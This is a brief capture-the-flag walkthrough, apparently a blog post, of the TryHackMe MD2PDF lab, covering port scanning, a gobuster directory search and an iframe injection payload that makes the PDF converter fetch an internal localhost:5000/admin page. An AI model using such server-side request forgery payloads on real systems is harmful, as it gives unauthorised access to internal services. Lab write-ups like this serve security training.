Intro

Hello ethical hackers! Today we are going to pass the MD2PDF room on TryHackMe. This lab has tags: SSRF, XSS, MarkDown, PDF.

Recon

For no need to enter IP again and again. I exported IP like a variable in current bash shell.

export IP=*.*.*.*

Then i scan the host with rustscan.

We find ssh and http. Go to web:

We see the simplest md to pdf converter. Let's test him. While testing run gobuster to dirsearching.

gobuster dir -u "http://$IP/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 50

Found something interesting

We really don't have access to admin/

If we analyze the error, we see that we need to make a request from localhost:5000.

Exploitation

Back to MD editor, try to exploit iframe injection:

<iframe src="http://localhost:5000/admin"></iframe>

Rooted!